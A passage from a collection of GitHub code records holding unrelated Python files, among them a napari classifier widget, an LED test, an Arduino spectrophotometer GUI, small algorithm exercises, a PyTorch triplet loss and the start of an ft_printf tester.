self.nominal\n )\n )\n self.add_equation(\n (\n (self.Secondary_heat - (self.Secondary.HeatOut.Heat - self.Secondary.HeatIn.Heat))\n / self.nominal\n )\n )\n self.add_equation((self.Heat_flow - self.Secondary_heat) / self.nominal)\n","repo_name":"Nieuwe-Warmte-Nu/rtc-tools-heat-network","sub_path":"src/rtctools_heat_network/pycml/component_library/heat/heat_exchanger.py","file_name":"heat_exchanger.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25152044477","text":"from qtpy.QtWidgets import (QVBoxLayout, QPushButton, QWidget,\n QLabel, QFileDialog, QListWidget, QAbstractItemView,\n QCheckBox, QLineEdit, QSpinBox, QDoubleSpinBox,QGridLayout)\nfrom qtpy.QtCore import Qt\nimport numpy as np\nimport skimage\nfrom pathlib import Path\n\nfrom ..classifier import Classifier\nfrom napari_convpaint.conv_paint_utils import Hookmodel, Classifier\nfrom napari_convpaint.conv_paint_utils import (get_features_current_layers,\n train_classifier, predict_image)\n\nclass MLWidget(QWidget):\n \"\"\"Widget for ml pixel classification. 
Parent should have:\n - an attribute called rgb_names, specifying the channels to use.\"\"\"\n\n def __init__(self, parent, napari_viewer):\n super().__init__(parent)\n\n self.parent = parent\n self.viewer = napari_viewer\n self.pixclass = None\n self.classifier = None\n self.data = None\n\n self.main_layout = QGridLayout()\n self.setLayout(self.main_layout)\n \n self.btn_add_annotation_layer = QPushButton(\"Add annotation layer\")\n self.main_layout.addWidget(self.btn_add_annotation_layer, 0, 0, 1, 2)\n self.check_smoothing = QCheckBox('Gaussian smoothing')\n self.check_smoothing.setChecked(False)\n self.main_layout.addWidget(self.check_smoothing, 1, 0, 1, 1)\n self.spin_gaussian_smoothing = QDoubleSpinBox()\n self.spin_gaussian_smoothing.setRange(0.1, 10)\n self.spin_gaussian_smoothing.setSingleStep(0.1)\n self.spin_gaussian_smoothing.setValue(3)\n self.main_layout.addWidget(self.spin_gaussian_smoothing, 1, 1, 1, 1)\n self.spin_downscale = QSpinBox()\n self.spin_downscale.setRange(1, 10)\n self.spin_downscale.setSingleStep(1)\n self.spin_downscale.setValue(4)\n self.main_layout.addWidget(QLabel('Downscale factor'), 2, 0, 1, 1)\n self.main_layout.addWidget(self.spin_downscale, 2, 1, 1, 1)\n self.btn_reset_mlmodel = QPushButton(\"(Re-)train pixel classifier\")\n self.main_layout.addWidget(self.btn_reset_mlmodel, 3, 0, 1, 2)\n self.btn_ml_mask = QPushButton(\"Generate mask\")\n self.main_layout.addWidget(self.btn_ml_mask, 4, 0, 1, 2)\n self.btn_save_model = QPushButton(\"Save model\")\n self.main_layout.addWidget(self.btn_save_model, 5, 0, 1, 2)\n self.btn_load_model = QPushButton(\"Load model\")\n self.main_layout.addWidget(self.btn_load_model, 6, 0, 1, 2)\n\n self.add_connections()\n\n def add_connections(self):\n\n self.btn_add_annotation_layer.clicked.connect(self._on_click_add_annotation_layer)\n self.btn_reset_mlmodel.clicked.connect(self._on_initialize_model)\n self.btn_ml_mask.clicked.connect(self._on_click_ml_mask)\n self.btn_save_model.clicked.connect(self._on_click_save_model)\n self.btn_load_model.clicked.connect(self._on_click_load_model)\n\n\n def _on_click_add_annotation_layer(self):\n \"\"\"Add annotation layer to viewer\"\"\"\n\n if 'annotations' in self.viewer.layers:\n print('Annotations layer already exists')\n return\n self.viewer.add_labels(np.zeros_like(self.viewer.layers['mask'].data), name='annotations', opacity=0.5)\n\n def _on_initialize_model(self, event=None):\n\n if 'annotations' not in self.viewer.layers:\n raise ValueError('No annotation layer found')\n \n reduce_fact = self.spin_downscale.value()\n self.data = self.get_data()\n annotations = self.viewer.layers['annotations'].data[::reduce_fact,::reduce_fact]\n \n if self.classifier is None:\n self.classifier = Classifier()\n\n features, targets = get_features_current_layers(\n model=self.classifier.model, image=self.data, annotations=annotations,\n scalings=self.classifier.param.scalings,\n order=self.classifier.param.order, use_min_features=self.classifier.param.use_min_features)\n self.classifier.random_forest = train_classifier(features, targets)\n\n def get_data(self):\n\n reduce_fact = self.spin_downscale.value()\n #data = self.viewer.layers['imcube'].data\n data = self.parent.rgb_widget.get_current_rgb_cube()\n\n if len(data) != 3:\n raise ValueError('Only three channel images are supported')\n \n if self.check_smoothing.isChecked():\n data = skimage.filters.gaussian(data, sigma=self.spin_gaussian_smoothing.value(), preserve_range=True)[:, ::reduce_fact, ::reduce_fact]\n else:\n data = data[:, ::reduce_fact, 
::reduce_fact]\n return data.mean(axis=0)\n\n def _on_click_ml_mask(self):\n\n #if 'annotations' not in self.viewer.layers:\n # raise ValueError('No annotation layer found')\n \n if self.classifier is None:\n self._on_initialize_model()\n \n if self.data is None:\n self.data = self.get_data()\n\n pred = predict_image(\n self.data, self.classifier.model,\n self.classifier.random_forest,\n self.classifier.param.scalings,\n self.classifier.param.order, self.classifier.param.use_min_features)\n \n pred = (pred == 1).astype(np.uint8)\n predict_upscale = skimage.transform.resize(\n pred, self.viewer.layers['mask'].data.shape, order=0)\n if 'ml-mask' in self.viewer.layers:\n self.viewer.layers['ml-mask'].data = predict_upscale\n else:\n self.viewer.add_labels((predict_upscale==1).astype(np.uint8), name='ml-mask')\n\n def _on_click_save_model(self, event=None, save_path=None):\n \n if save_path is None:\n dialog = QFileDialog()\n save_path, _ = dialog.getSaveFileName(self, \"Save model\", None, \"JOBLIB (*.joblib)\")\n save_path = Path(save_path)\n\n self.classifier.save_classifier(save_path)\n\n def _on_click_load_model(self, event=None, load_path=None):\n\n self.classifier = Classifier()\n \n if load_path is None:\n dialog = QFileDialog()\n load_path, _ = dialog.getOpenFileName(self, \"Load model\", None, \"JOBLIB (*.joblib)\")\n load_path = Path(load_path)\n\n self.classifier.load_model(load_path)\n","repo_name":"guiwitz/napari-sediment","sub_path":"src/napari_sediment/widgets/mlwidget.py","file_name":"mlwidget.py","file_ext":"py","file_size_in_byte":6294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39886105361","text":"'''\nMyRoboPW: Test for 2x RGB LEDs\nDate: 1/7/2023\nCode by: NAR\n\nAdditional Library:\n - neopixel.mpy\n'''\n\nimport time\nimport board\nimport neopixel\nimport random\n\n# Configure the setup\nPIXEL_PIN = board.GP18 # pin that the NeoPixel is connected to\nORDER = neopixel.GRB # pixel color channel order\nCOLORB = (0, 0, 255) # color to blink (Red, Green, Blue)\nCOLORR = (255, 0, 0) # color to blink (Red, Green, Blue)\nCOLORG = (0, 255, 0) # color to blink (Red, Green, Blue)\nCLEAR = (0, 0, 0) # clear (or second color)\nDELAY = 0.5 # blink rate in seconds\nnum_pixel = 2 # number of RGB LEDs\n\n# Create the NeoPixel object\npixel = neopixel.NeoPixel(PIXEL_PIN, num_pixel, brightness=0.1, pixel_order=ORDER)\n\nwhile True:\n # Blue Color\n for i in range (num_pixel):\n pixel[i] = COLORB\n time.sleep(DELAY)\n pixel[i] = CLEAR\n time.sleep(DELAY)\n # Red Color\n for j in range(num_pixel):\n pixel[j] = COLORR\n time.sleep(DELAY)\n pixel[j] = CLEAR\n time.sleep(DELAY)\n # Green Color\n for k in range (num_pixel):\n pixel[k] = COLORG\n time.sleep(DELAY)\n pixel[k] = CLEAR\n time.sleep(DELAY)\n \n time.sleep(1)\n \n # Clear the Pixels\n pixel.fill((0, 0, 0))\n \n # Random Color for ALL Pixels\n for i in range (10):\n pixel.fill((random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)))\n pixel.show()\n time.sleep(DELAY)\n\n time.sleep(1)\n \n # Clear the Pixels\n pixel.fill((0, 0, 0))\n","repo_name":"mymadi/MyRoboPicoW","sub_path":"04_MyRPW_RGBLEDs/04MR_RGBLEDs.py","file_name":"04MR_RGBLEDs.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71392239187","text":"\r\n#-------------------------------------------------------------------------------\r\n# UAMonitor: A controler for a homemade 
spectrophotometer created for\r\n# iGEM Competition 2022 (beta v0.1)\r\n# Silva Tovar Mauricio \r\n# Reyes Morales Laura Mariana \r\n# Carrasco González Mauricio \r\n# Hernandez Monzalvo Alicia Jacqueline\r\n# October, 2022\r\n# iGEM UAM\r\n#-------------------------------------------------------------------------------\r\n\r\n#Enable if you use JupyterLab\r\n#%matplotlib widget\r\n#Packages used\r\nimport tkinter\r\nimport serial \r\nimport time\r\nimport os\r\nimport re\r\nimport threading\r\nimport multiprocessing\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom datetime import date\r\nfrom datetime import datetime\r\nfrom tkinter import filedialog\r\n\r\n# Implement the default Matplotlib key bindings.\r\nfrom matplotlib.backend_bases import key_press_handler\r\nfrom matplotlib.backends.backend_tkagg import (FigureCanvasTkAgg, NavigationToolbar2Tk)\r\nfrom matplotlib.figure import Figure\r\nfrom matplotlib.pyplot import *\r\nimport matplotlib.animation as animation\r\nfrom matplotlib import backend_bases\r\n\r\n\r\n#Initial conditions\r\nledFlu=0\r\nledOD=0\r\n\r\n\r\n\r\n\r\n\r\n#Create a Tk interface with our icon and title\r\nroot = tkinter.Tk()\r\nroot.wm_title(\"UAMonitor\")\r\n\r\nif \"nt\" == os.name:\r\n root.wm_iconbitmap(bitmap = \"iGEM.ico\")\r\nelse:\r\n root.wm_iconbitmap(bitmap = \"iGEM.xbm\")\r\n\r\n#root['background']='yellow'\r\n\r\n#imgicon = PhotoImage(file=os.path.join(Documents/Mauricio/iGEM/Arduino/Espectro_Foto/sketch_sep28a/iGEM.ico,'iGEM.ico'))\r\n#root.tk.call('wm', 'iconphoto', root._w, imgicon) \r\n\r\n\r\n\"\"\"\r\nFrame = tkinter.Frame() #Frame creation\r\nFrame.config(cursor=\"heart\")\r\nFrame.config(width=\"150\", height=\"150\")\r\nFrame.pack(fill=\"both\")\r\nFrame.config(bg=\"blue\")\r\nFrame.pack(side=\"bottom\")\r\n\"\"\"\r\n\r\n# initialize the data arrays \r\ngDATA = []\r\ngDATA.append([0])\r\ngDATA.append([0])\r\ngDATA.append([0])\r\n\r\n# create a figure with two subplots\r\nfig, (ax1, ax2) = subplots(1,2)\r\n\r\n#Add the figure to the Tk interface\r\ncanvas = FigureCanvasTkAgg(fig, master=root) # A tk.DrawingArea.\r\ncanvas.draw()\r\ncanvas.get_tk_widget().pack(side=tkinter.TOP, fill=tkinter.BOTH, expand=1)\r\n\r\n#Configure Fluorescence plot\r\nax1.set_title('Fluorescence')\r\nax1.grid()\r\nax1.set_xlim((0,100))\r\nax1.set_ylim((-1,100))\r\n\r\n#Configure Optical Density plot\r\nax2.set_title('Optical Density')\r\nax2.grid()\r\nax2.set_xlim((0,100))\r\nax2.set_ylim((-1,100))\r\n\r\n\r\n# initialize two line objects (one in each axes)\r\nline1, = ax1.plot(gDATA[0], gDATA[1], lw=2, color='green')\r\nline2, = ax2.plot(gDATA[0], gDATA[2], lw=2, color='orange')\r\nline = [line1, line2]\r\n\r\n\r\n\r\ndef update_line(num,line,data):\r\n \r\n# axis limits checking. 
Same as before, just for both axes\r\n for ax in [ax1, ax2]:\r\n xmin, xmax = ax.get_xlim()\r\n if max(data[0])>= xmax:\r\n ax.set_xlim(xmin, 1.5*xmax)\r\n ax.figure.canvas.draw()\r\n # update the data of both line objects\r\n line[0].set_data(data[0], data[1])\r\n line[1].set_data(data[0], data[2])\r\n\r\n return line\r\n\r\nani = animation.FuncAnimation(fig, update_line, blit=True, fargs=(line, gDATA),interval=100, repeat=False)\r\n\r\n\r\n\r\n\r\n#In the next part we remove the button configure subplot because cause a warning message.\r\n# mpl.rcParams['toolbar'] = 'None'\r\nbackend_bases.NavigationToolbar2.toolitems = (\r\n ('Home', 'Reset original view', 'home', 'home'),\r\n ('Back', 'Back to previous view', 'back', 'back'),\r\n ('Forward', 'Forward to next view', 'forward', 'forward'),\r\n (None, None, None, None),\r\n ('Pan', 'Pan axes with left mouse, zoom with right', 'move', 'pan'),\r\n ('Zoom', 'Zoom to rectangle', 'zoom_to_rect', 'zoom'),\r\n (None, None, None, None),\r\n ('Save', 'Save the figure', 'filesave', 'save_figure'),\r\n )\r\n\r\n#Add a Toolbar to control the figure\r\ntoolbar = NavigationToolbar2Tk(canvas, root)\r\ntoolbar.update()\r\ncanvas.get_tk_widget().pack(side=tkinter.TOP, fill=tkinter.BOTH, expand=1)\r\n\r\n\"\"\"\r\n#For some reason this funtion print if you preesed a key\r\ndef on_key_press(event):\r\n print(\"you pressed {}\".format(event.key))\r\n key_press_handler(event, canvas, toolbar)\r\n\r\n\r\ncanvas.mpl_connect(\"key_press_event\", on_key_press)\r\n\"\"\"\r\n\r\ndef timer(condition):\r\n global tim\r\n tim=0\r\n while True:\r\n time.sleep(0.1)\r\n tim = tim + 0.1\r\n if Mode != condition:\r\n break\r\n return\r\n\r\n\r\ndef GetData(gDATA,condition,state):\r\n\r\n global format\r\n #Time \r\n if condition != 'M' or state != 'O':\r\n format = datetime.now().strftime('%d-%m-%Y, %H;%M;%S')\r\n \r\n global vFlu\r\n vFlu=0\r\n global vOD\r\n vOD=0\r\n\r\n gDATA[0]=[0]\r\n gDATA[1]=[0]\r\n gDATA[2]=[0]\r\n\r\n \r\n #datAR =serialArduino.readline().decode('ascii') \r\n datAR =serialArduino.readline().decode('ascii').strip()\r\n time.sleep(0.5)\r\n \r\n if condition == 'M' and state == 'O':\r\n time.sleep(1.0)\r\n\r\n format_before = '0'\r\n \r\n while True:\r\n\r\n \r\n if datAR:\r\n pos=datAR.index(\",\")\r\n if state == 'F':\r\n vFlu=int(datAR[:pos])\r\n if state == 'O':\r\n vOD=int(datAR[pos+1:])\r\n gDATA[0].append(tim)\r\n gDATA[1].append(vFlu)\r\n gDATA[2].append(vOD)\r\n\r\n saves = pd.DataFrame(gDATA,index=['Time', 'Fluorecense','Optical Density']).transpose()\r\n saves.to_csv('data '+str(format)+'('+str(condition)+').csv', index=False)\r\n if len(gDATA[0]) > 200:\r\n if condition != 'M' or state != 'O':\r\n if format_before != '0':\r\n data = pd.read_csv('data '+str(format)+'('+str(condition)+').csv', index=False) \r\n updated_data = pd.read_csv('data '+str(format)+'.csv') \r\n final_dataframe = pd.concat([data, updated_data]).drop_duplicates(subset='Time', keep='last').reset_index(drop=True) \r\n final_dataframe.to_csv('data '+str(format)+'.csv', index=False)\r\n os.remove('data '+str(format_before)+'.csv')\r\n i = 0\r\n gDATA[0]=[]\r\n gDATA[1]=[]\r\n gDATA[2]=[]\r\n format_before = format\r\n format=datetime.now().strftime('%d-%m-%Y, %H;%M;%S')\r\n datAR =serialArduino.readline().decode('ascii').strip() \r\n time.sleep(1) \r\n if Mode != condition:\r\n break\r\n return\r\n\r\ndef Monitor_loop(condition):\r\n while True:\r\n Assing_LED(1,0)\r\n time.sleep(1)\r\n Assing_LED(0,1)\r\n time.sleep(1)\r\n print(\"Sí\")\r\n if condition != 'M':\r\n 
break\r\n return\r\n\r\n#This function controls the state of the LEDs\r\ndef Assing_LED(ledFlu,ledOD):\r\n dat = str(ledFlu) + \",\"+ str(ledOD)\r\n serialArduino.write(dat.encode('ascii'))\r\n return\r\n \r\ndef _stop():\r\n if serialArduino != None:\r\n Assing_LED(0,0)\r\n global Mode\r\n Mode = 'X'\r\n return \r\n\r\n\r\ndef _connect():\r\n global serialArduino\r\n serialArduino = serial.Serial(\"COM2\",9600,timeout=1.0)\r\n if serialArduino != None:\r\n tkinter.messagebox.showinfo(\"Information Window\", \"Successful connection with Arduino\")\r\n return \r\n\r\ndef _quit():\r\n root.quit() # stops mainloop\r\n root.destroy() # this is necessary on Windows to avoid a fatal Python error\r\n _stop()\r\n serialArduino.close()\r\n return # Fatal Python Error: PyEval_RestoreThread: NULL tstate\r\n\r\ndef _save():\r\n dataFile=pd.read_csv('data '+str(format)+'('+str(Mode)+').csv')\r\n SAVING_PATH = filedialog.asksaveasfile(mode='w', defaultextension=\".csv\")\r\n dataFile.to_csv(SAVING_PATH)\r\n\r\n'''**********************\r\n* MODES MENU *\r\n************************\r\n* *\r\n* F >> Fluorescence mode *\r\n* O >> OD mode *\r\n* M >> Monitor mode *\r\n* X >> Exit *\r\n* *\r\n************************'''\r\n\r\n#Definition of Fluorescence Mode \r\ndef _FLU():\r\n global Mode\r\n Mode='F'\r\n Assing_LED(1,0)\r\n Cronometer = threading.Thread(target = timer, args=('F',)) \r\n dataCollectorFLU = threading.Thread(target = GetData, args=(gDATA,'F','F',))\r\n dataCollectorFLU.start()\r\n Cronometer.start()\r\n return\r\n\r\n#Definition of Optical Density Mode\r\ndef _OD():\r\n global Mode\r\n Mode='O'\r\n Assing_LED(0,1)\r\n Cronometer = threading.Thread(target = timer, args=('O',)) \r\n dataCollectorOD = threading.Thread(target = GetData, args=(gDATA,'O','O',))\r\n dataCollectorOD.start()\r\n Cronometer.start()\r\n return\r\n\r\n#Definition of Monitor Mode\r\ndef _MON():\r\n global Mode\r\n Mode='M'\r\n Assing_LED(1,1)\r\n #loop= threading.Thread(target = Monitor_loop, args=('M',)) \r\n #loop.start()\r\n Cronometer = threading.Thread(target = timer, args=('M',)) \r\n dataCollectorMON_FLU = threading.Thread(target = GetData, args=(gDATA,'M','F',))\r\n dataCollectorMON_OD = threading.Thread(target = GetData, args=(gDATA,'M','O',))\r\n dataCollectorMON_FLU.start() \r\n dataCollectorMON_OD.start()\r\n Cronometer.start()\r\n return\r\n\r\n \r\n\r\n#Enable a button and option to quit the window\r\nqui = tkinter.Button(master=root, text=\"Quit\", command=_quit, fg=\"#E0218A\")\r\nqui.pack(side=tkinter.RIGHT)\r\n \r\n#Enable a button and option to stop measuring\r\nsto = tkinter.Button(master=root, text=\"Stop\", command=_stop, fg=\"#E0218A\")\r\nsto.pack(side=tkinter.RIGHT)\r\n \r\n#Enable a button of the function to connect the program to Arduino \r\ncon = tkinter.Button(master=root, text=\"Connect Arduino\", command=_connect, fg=\"#E0218A\")\r\ncon.pack(side=tkinter.TOP)\r\n\r\n#Label to indicate the version\r\nlabel = tkinter.Label(root, text=\"UAMonitor beta v0.1\")\r\nlabel.pack(side=tkinter.BOTTOM, anchor=tkinter.CENTER)\r\n\r\n#Enable a button to save the collected data\r\nMon = tkinter.Button(master=root, text=\"Save\", command=_save, fg=\"#E0218A\")\r\nMon.pack(side=tkinter.BOTTOM)\r\n\r\n#Enable a button of the OD Mode\r\nOD = tkinter.Button(master=root, text=\"OD Mode\", command=_OD, fg=\"#E0218A\")\r\nOD.pack(side=tkinter.LEFT)\r\n\r\n#Enable a button of the Fluorescence Mode\r\nFlu = tkinter.Button(master=root, text=\"Fluorescence Mode\", command=_FLU, fg=\"#E0218A\")\r\nFlu.pack(side=tkinter.LEFT)\r\n\r\n#Enable a button of the 
Monitor Mode\r\n#Mon = tkinter.Button(master=root, text=\"Monitor Mode\", command=_MON, fg=\"#E0218A\")\r\n#Mon.pack(side=tkinter.LEFT)\r\n\r\nroot.mainloop()\r\n# If you put root.destroy() here, it will cause an error if the window is closed with the window manager.\r\n","repo_name":"Rexmali/iGEM-UAM2022","sub_path":"UAMonitor(Sourse)/UAMonitor_python/UAMonitor.py","file_name":"UAMonitor.py","file_ext":"py","file_size_in_byte":10163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39624916982","text":"def swap(string_):\n \"\"\"Given a string, swap the case for each of the letters.\n e.g. CodEwArs --> cODeWaRS\"\"\"\n s = ''\n for i in string_:\n if i.isupper():\n s += i.lower()\n else:\n s += i.upper()\n return s\n\n # return string_.swapcase()\n\n\nassert swap('HelloWorld') == 'hELLOwORLD'\nassert swap('CodeWars') == 'cODEwARS'\n","repo_name":"suminv/codewar","sub_path":"swap_func.py","file_name":"swap_func.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41422307870","text":"def maxSubArrayNaive(nums):\n max_sum = max(nums)\n size = len(nums)\n idxs = [r for r in range(0, size)]\n sums = dict(zip(idxs, nums))\n for i in idxs:\n for j in idxs[:size-i]:\n if i != 0 and sums[j] > max_sum:\n max_sum = sums[j]\n if (j+i != size-1):\n sums[j] += nums[j+i+1]\n return max_sum\n\n\ndef maxSubArrayKadane(input):\n if len(input) == 0:\n return None\n maxSoFar = maxEndingHere = input[0]\n for idx, value in enumerate(input):\n if idx >= 1:\n maxEndingHere = max(value, maxEndingHere + value)\n if maxEndingHere > maxSoFar:\n maxSoFar = maxEndingHere\n return maxSoFar\n\n\ninput = [-2, 1, -3, 4, -1, 2, 1, -5, 4]\n\nprint(maxSubArrayKadane(input))\n","repo_name":"erchiggins/leet-april","sub_path":"max_subarray.py","file_name":"max_subarray.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9004310731","text":"from sys import stdin, stdout\n\ntests = int(stdin.readline())\n\nwhile tests > 0:\n tests -= 1\n\n n, k = map(int, stdin.readline().split())\n heights_map = map(int, stdin.readline().split())\n heights = list(heights_map)\n\n if n == 1:\n print(-1)\n continue\n\n heights.sort()\n heights.reverse()\n\n # list has two boxes taller than needed\n if heights[1] >= k:\n print(2)\n continue\n # list has one tall enough. remove it and compute the other\n # obviously, the one tall enough is first one\n elif heights[0] >= k:\n tracy = 0\n count = 1\n # pick that one and build another\n for i in range(1, len(heights)):\n count += 1\n tracy += heights[i]\n if tracy >= k:\n break\n\n if tracy >= k:\n print(count)\n else:\n print(-1)\n continue\n\n # no trivial cases present\n # compute DP to find out minimum needed to reach closest to k\n max_dp = k + heights[0]\n dp = [len(heights) + 1] * max_dp\n temp_dp = [len(heights) + 1] * max_dp\n prev = [-1] * (2 * k)\n\n heights_len = len(heights)\n\n for j in range(0, heights_len):\n for i in range(heights[j], max_dp):\n if i == heights[j]:\n dp[i] = 1\n prev[i] = j\n else:\n if (temp_dp[i - heights[j]] + 1) < dp[i]:\n dp[i] = temp_dp[i - heights[j]] + 1\n prev[i] = j\n for i in range(1, max_dp):\n temp_dp[i] = dp[i]\n\n least_count = (heights_len + 1) * 2.0\n count_found = False\n # find the combination with least no. 
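The `maxSubArrayKadane` record above keeps a running best suffix sum with `maxEndingHere = max(x, maxEndingHere + x)`. A compact restatement of the recurrence with a traced run on the same sample input (purely illustrative, mirroring the record's logic):

```python
# Trace on [-2, 1, -3, 4, -1, 2, 1, -5, 4]:
# max_ending_here: -2, 1, -2, 4, 3, 5, 6, 1, 5
# max_so_far:      -2, 1,  1, 4, 4, 5, 6, 6, 6  -> answer 6 (subarray [4, -1, 2, 1])
def max_subarray(nums):
    best = cur = nums[0]
    for x in nums[1:]:
        cur = max(x, cur + x)    # either extend the current run or restart at x
        best = max(best, cur)
    return best

assert max_subarray([-2, 1, -3, 4, -1, 2, 1, -5, 4]) == 6
```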
of boxes\n for h in range(k, max_dp):\n if dp[h] < heights_len and dp[h] < (least_count / 2.0):\n # there's a potential combination\n # compute map with used up indices\n cur_height = h\n used_boxes = []\n cur_prev = prev[h]\n while cur_height > 0:\n used_boxes.append(cur_prev)\n cur_height -= heights[cur_prev]\n cur_prev = prev[cur_height]\n\n # now start in descending order and compute tracy's height\n tracy = 0\n count = 0\n box_idx = 0\n while tracy < k and box_idx < heights_len:\n if used_boxes.__contains__(box_idx):\n box_idx += 1\n else:\n count += 1\n tracy += heights[box_idx]\n box_idx += 1\n\n if tracy >= k and least_count > (dp[h] + count):\n count_found = True\n least_count = dp[h] + count\n if count_found:\n break\n\n if count_found:\n print(least_count)\n else:\n print(-1)\n","repo_name":"adit-t/competitive-programming","sub_path":"codechef/long-challenges/2021/jan/wipl.py","file_name":"wipl.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22070154585","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom ..registry import LOSSES\nfrom .utils import weighted_loss\nimport math\n\n\n@weighted_loss\ndef triplet_loss(distance, label, alpha):\n # distance: (n, num_class, num_mode)\n # label: (n, 1)\n if label.size(0) == 0:\n loss = torch.tensor(0.0).to(label.device)\n else:\n label_ = label-1\n cls_gt_idx = torch.zeros(distance.size(0), distance.size(1)).to(label_.device).scatter(1, label_, 1).byte()\n cls_other_idx = torch.ones(distance.size(0), distance.size(1)).to(label_.device).scatter(1, label_, 0).byte()\n dis_cls_gt = distance[cls_gt_idx].view(distance.size(0), -1, distance.size(2))\n dis_cls_other = distance[cls_other_idx].view(distance.size(0), -1, distance.size(2))\n dis_cls_gt_min = dis_cls_gt.min(1)[0].min(1)[0]\n dis_cls_other_min = dis_cls_other.min(1)[0].min(1)[0]\n loss = F.relu(dis_cls_gt_min - dis_cls_other_min + alpha)\n return loss\n\n\n@LOSSES.register_module\nclass TripletLoss(nn.Module):\n\n def __init__(self, alpha=0.3, reduction='mean', loss_weight=1.0):\n super(TripletLoss, self).__init__()\n self.alpha = alpha\n self.reduction = reduction\n self.loss_weight = loss_weight\n\n def forward(self,\n distance,\n label,\n weight=None,\n avg_factor=None,\n reduction_override=None,\n **kwargs):\n assert reduction_override in (None, 'none', 'mean', 'sum')\n reduction = (\n reduction_override if reduction_override else self.reduction)\n loss_repmet = self.loss_weight * triplet_loss(\n distance,\n label,\n weight,\n alpha=self.alpha,\n reduction=reduction,\n avg_factor=avg_factor,\n **kwargs)\n # loss_repmet = self.loss_weight * repmet_loss(\n # distance,\n # label,\n # alpha=self.alpha,\n # weight=weight)\n # print(loss_repmet)\n return loss_repmet\n","repo_name":"yrqs/DMNet","sub_path":"mmdet/models/losses/triplet_loss.py","file_name":"triplet_loss.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21864743427","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport argparse\nimport ctypes\nimport ctypes.util\nimport signal\nimport time\nimport subprocess\n\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\n\n# *************************************************************************** #\n# Retrieving functions to compare. 
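The triplet loss record above reduces, per sample, to `relu(d_gt_min - d_other_min + alpha)`: the distance to the closest ground-truth-class representative should beat the distance to the closest other-class representative by at least the margin. A toy numeric illustration of that margin term (the distance values are invented):

```python
import torch
import torch.nn.functional as F

alpha = 0.3
d_gt_min = torch.tensor([0.2, 0.9])     # closest ground-truth-class distance per sample
d_other_min = torch.tensor([0.8, 0.4])  # closest other-class distance per sample

loss = F.relu(d_gt_min - d_other_min + alpha)
print(loss)  # tensor([0.0000, 0.8000]): sample 1 already satisfies the margin
```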
#\n# *************************************************************************** #\n\nlibftprintf = ctypes.cdll.LoadLibrary(os.path.join(BASE_DIR, 'libftprintf.so'))\nlibc = ctypes.cdll.LoadLibrary(ctypes.util.find_library('c'))\n\nft_printf = libftprintf.ft_printf\nprintf = libc.printf\n\n# *************************************************************************** #\n# Defining texts. #\n# *************************************************************************** #\n\nclass Timeout:\n\n \"\"\"\n Context manager to handle operations taking to long time.\n Raises a TimeoutError in such case (that would have to be handled by a\n try/except block).\n \"\"\"\n \n def __init__(self, t=1, msg='This operation took too long'):\n self.t = t\n self.error_msg = msg\n\n def handle_timeout(self, signum, frame):\n raise TimeoutError(self.error_msg)\n\n def __enter__(self):\n if self.t != 0:\n signal.signal(signal.SIGALRM, self.handle_timeout)\n signal.setitimer(signal.ITIMER_REAL, self.t)\n #signal.alarm(self.t)\n\n def __exit__(self, type, value, traceback):\n signal.alarm(0)\n \ndef timeout_handler(fd):\n fd.write(str(-1))\n sys.exit(1)\n \n# *************************************************************************** #\n# Defining texts. #\n# *************************************************************************** #\n\nmsgs = {\n 'welcome': '{yllw}Welcome to this ft_printf testing tool!{rst}',\n 'global_head': '{grn}Welcome to this ft_printf test programm!{rst}',\n 'global_res': '{res}Global{rst} : [{res}%d{rst}/{grn}%d{rst}]',\n 'segv_res': '{res}Segv tests passed{rst} : [{res}%d{rst}/{grn}%d{rst}]',\n 'segv_case_res': '[{case}%r{rst}] -> [status : {res}%s{rst}]',\n 'subset_head': '*** Running \"{grn}%s{rst}\" tests. ***',\n 'subset_res':\n (\n '--- {res}%s{rst} results : [{res}%d{rst}/{grn}%d{rst}]. ---'\n ),\n 'test_normal_res': (\n '[case: #%s][{case}%r{rst}] -> [%s/%s]'\n '[{grn}%d{rst}/{res1}%d{rst}][{grn}%r{rst}/{res2}%r{rst}].'\n ),\n 'test_err': (\n '[case: #%s][{case}%r{rst}] -> [%s/%s]'\n '[{res1}%s{rst}/{res2}%s{rst}] ({res}%s{rst}).'\n ),\n 'exit_err': '{fail}%s cases exited non zero statuses.{rst}'\n}\n\n# *************************************************************************** #\n# Defining Tester class. #\n# *************************************************************************** #\n\n\nclass Tester:\n\n msgs = msgs\n\n def __init__(self, f1=printf, f2=ft_printf):\n self.f1 = f1\n self.f2 = f2 # function to test\n self.counters = {\n 'global_success': 0,\n 'global_tried': 0,\n 'local_success': 0,\n 'local_tried': 0,\n 'global_exit_err': 0,\n 'local_exit_err': 0,\n }\n\n def run(self, cases_generator=None, verbose=False, quiet=False,\n timeout=0.15):\n \"\"\"\n This is the main run() method. 
